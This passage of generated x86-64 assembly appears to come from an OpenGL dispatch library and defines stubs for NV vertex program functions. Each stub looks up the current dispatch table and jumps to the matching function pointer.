movq 5200(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_650), .-GL_PREFIX(_dispatch_stub_650)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_651)
.type GL_PREFIX(_dispatch_stub_651), @function
HIDDEN(GL_PREFIX(_dispatch_stub_651))
GL_PREFIX(_dispatch_stub_651):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5208(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5208(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5208(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5208(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_651), .-GL_PREFIX(_dispatch_stub_651)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_652)
.type GL_PREFIX(_dispatch_stub_652), @function
HIDDEN(GL_PREFIX(_dispatch_stub_652))
GL_PREFIX(_dispatch_stub_652):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5216(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5216(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5216(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5216(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_652), .-GL_PREFIX(_dispatch_stub_652)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_653)
.type GL_PREFIX(_dispatch_stub_653), @function
HIDDEN(GL_PREFIX(_dispatch_stub_653))
GL_PREFIX(_dispatch_stub_653):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5224(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5224(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5224(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5224(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_653), .-GL_PREFIX(_dispatch_stub_653)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_654)
.type GL_PREFIX(_dispatch_stub_654), @function
HIDDEN(GL_PREFIX(_dispatch_stub_654))
GL_PREFIX(_dispatch_stub_654):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5232(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5232(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5232(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5232(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_654), .-GL_PREFIX(_dispatch_stub_654)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_655)
.type GL_PREFIX(_dispatch_stub_655), @function
HIDDEN(GL_PREFIX(_dispatch_stub_655))
GL_PREFIX(_dispatch_stub_655):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5240(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5240(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5240(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5240(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_655), .-GL_PREFIX(_dispatch_stub_655)
.p2align 4,,15
.globl GL_PREFIX(_dispatch_stub_656)
.type GL_PREFIX(_dispatch_stub_656), @function
HIDDEN(GL_PREFIX(_dispatch_stub_656))
GL_PREFIX(_dispatch_stub_656):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5248(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5248(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5248(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5248(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(_dispatch_stub_656), .-GL_PREFIX(_dispatch_stub_656)
.p2align 4,,15
.globl GL_PREFIX(AreProgramsResidentNV)
.type GL_PREFIX(AreProgramsResidentNV), @function
GL_PREFIX(AreProgramsResidentNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5256(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5256(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5256(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5256(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(AreProgramsResidentNV), .-GL_PREFIX(AreProgramsResidentNV)
.p2align 4,,15
.globl GL_PREFIX(BindProgramNV)
.type GL_PREFIX(BindProgramNV), @function
GL_PREFIX(BindProgramNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5264(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5264(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5264(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5264(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(BindProgramNV), .-GL_PREFIX(BindProgramNV)
.p2align 4,,15
.globl GL_PREFIX(DeleteProgramsNV)
.type GL_PREFIX(DeleteProgramsNV), @function
GL_PREFIX(DeleteProgramsNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5272(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5272(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5272(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5272(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DeleteProgramsNV), .-GL_PREFIX(DeleteProgramsNV)
.p2align 4,,15
.globl GL_PREFIX(ExecuteProgramNV)
.type GL_PREFIX(ExecuteProgramNV), @function
GL_PREFIX(ExecuteProgramNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5280(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5280(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5280(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5280(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ExecuteProgramNV), .-GL_PREFIX(ExecuteProgramNV)
.p2align 4,,15
.globl GL_PREFIX(GenProgramsNV)
.type GL_PREFIX(GenProgramsNV), @function
GL_PREFIX(GenProgramsNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5288(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5288(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5288(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5288(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GenProgramsNV), .-GL_PREFIX(GenProgramsNV)
.p2align 4,,15
.globl GL_PREFIX(GetProgramParameterdvNV)
.type GL_PREFIX(GetProgramParameterdvNV), @function
GL_PREFIX(GetProgramParameterdvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5296(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5296(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5296(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5296(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramParameterdvNV), .-GL_PREFIX(GetProgramParameterdvNV)
.p2align 4,,15
.globl GL_PREFIX(GetProgramParameterfvNV)
.type GL_PREFIX(GetProgramParameterfvNV), @function
GL_PREFIX(GetProgramParameterfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5304(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramParameterfvNV), .-GL_PREFIX(GetProgramParameterfvNV)
.p2align 4,,15
.globl GL_PREFIX(GetProgramStringNV)
.type GL_PREFIX(GetProgramStringNV), @function
GL_PREFIX(GetProgramStringNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5312(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5312(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5312(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5312(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramStringNV), .-GL_PREFIX(GetProgramStringNV)
.p2align 4,,15
.globl GL_PREFIX(GetProgramivNV)
.type GL_PREFIX(GetProgramivNV), @function
GL_PREFIX(GetProgramivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5320(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5320(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5320(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5320(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramivNV), .-GL_PREFIX(GetProgramivNV)
.p2align 4,,15
.globl GL_PREFIX(GetTrackMatrixivNV)
.type GL_PREFIX(GetTrackMatrixivNV), @function
GL_PREFIX(GetTrackMatrixivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5328(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5328(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5328(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5328(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetTrackMatrixivNV), .-GL_PREFIX(GetTrackMatrixivNV)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribPointervNV)
.type GL_PREFIX(GetVertexAttribPointervNV), @function
GL_PREFIX(GetVertexAttribPointervNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5336(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5336(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5336(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5336(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribPointervNV), .-GL_PREFIX(GetVertexAttribPointervNV)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribdvNV)
.type GL_PREFIX(GetVertexAttribdvNV), @function
GL_PREFIX(GetVertexAttribdvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5344(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5344(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5344(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5344(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribdvNV), .-GL_PREFIX(GetVertexAttribdvNV)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribfvNV)
.type GL_PREFIX(GetVertexAttribfvNV), @function
GL_PREFIX(GetVertexAttribfvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5352(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5352(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5352(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5352(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribfvNV), .-GL_PREFIX(GetVertexAttribfvNV)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribivNV)
.type GL_PREFIX(GetVertexAttribivNV), @function
GL_PREFIX(GetVertexAttribivNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5360(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 5360(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5360(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 5360(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribivNV), .-GL_PREFIX(GetVertexAttribivNV)
.p2align 4,,15
.globl GL_PREFIX(IsProgramNV)
.type GL_PREFIX(IsProgramNV), @function
GL_PREFIX(IsProgramNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5368(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 5368(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5368(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 5368(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(IsProgramNV), .-GL_PREFIX(IsProgramNV)
.p2align 4,,15
.globl GL_PREFIX(LoadProgramNV)
.type GL_PREFIX(LoadProgramNV), @function
GL_PREFIX(LoadProgramNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5376(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5376(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5376(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5376(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadProgramNV), .-GL_PREFIX(LoadProgramNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramParameters4dvNV)
.type GL_PREFIX(ProgramParameters4dvNV), @function
GL_PREFIX(ProgramParameters4dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5384(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5384(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5384(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5384(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramParameters4dvNV), .-GL_PREFIX(ProgramParameters4dvNV)
.p2align 4,,15
.globl GL_PREFIX(ProgramParameters4fvNV)
.type GL_PREFIX(ProgramParameters4fvNV), @function
GL_PREFIX(ProgramParameters4fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5392(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5392(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5392(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5392(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramParameters4fvNV), .-GL_PREFIX(ProgramParameters4fvNV)
.p2align 4,,15
.globl GL_PREFIX(RequestResidentProgramsNV)
.type GL_PREFIX(RequestResidentProgramsNV), @function
GL_PREFIX(RequestResidentProgramsNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5400(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5400(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5400(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5400(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(RequestResidentProgramsNV), .-GL_PREFIX(RequestResidentProgramsNV)
.p2align 4,,15
.globl GL_PREFIX(TrackMatrixNV)
.type GL_PREFIX(TrackMatrixNV), @function
GL_PREFIX(TrackMatrixNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5408(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5408(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5408(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 5408(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TrackMatrixNV), .-GL_PREFIX(TrackMatrixNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1dNV)
.type GL_PREFIX(VertexAttrib1dNV), @function
GL_PREFIX(VertexAttrib1dNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5416(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5416(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5416(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5416(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1dNV), .-GL_PREFIX(VertexAttrib1dNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1dvNV)
.type GL_PREFIX(VertexAttrib1dvNV), @function
GL_PREFIX(VertexAttrib1dvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5424(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5424(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5424(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5424(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1dvNV), .-GL_PREFIX(VertexAttrib1dvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1fNV)
.type GL_PREFIX(VertexAttrib1fNV), @function
GL_PREFIX(VertexAttrib1fNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5432(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5432(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5432(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 5432(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1fNV), .-GL_PREFIX(VertexAttrib1fNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1fvNV)
.type GL_PREFIX(VertexAttrib1fvNV), @function
GL_PREFIX(VertexAttrib1fvNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5440(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5440(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5440(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1fvNV), .-GL_PREFIX(VertexAttrib1fvNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1sNV)
.type GL_PREFIX(VertexAttrib1sNV), @function
GL_PREFIX(VertexAttrib1sNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5448(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1sNV), .-GL_PREFIX(VertexAttrib1sNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1svNV)
.type GL_PREFIX(VertexAttrib1svNV), @function
GL_PREFIX(VertexAttrib1svNV):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 5456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 5456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 5456(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 5456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1svNV), .-GL_PREFIX(VertexAttrib1svNV)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2dNV)
.type GL_PREFIX(VertexAttrib2dNV), @function
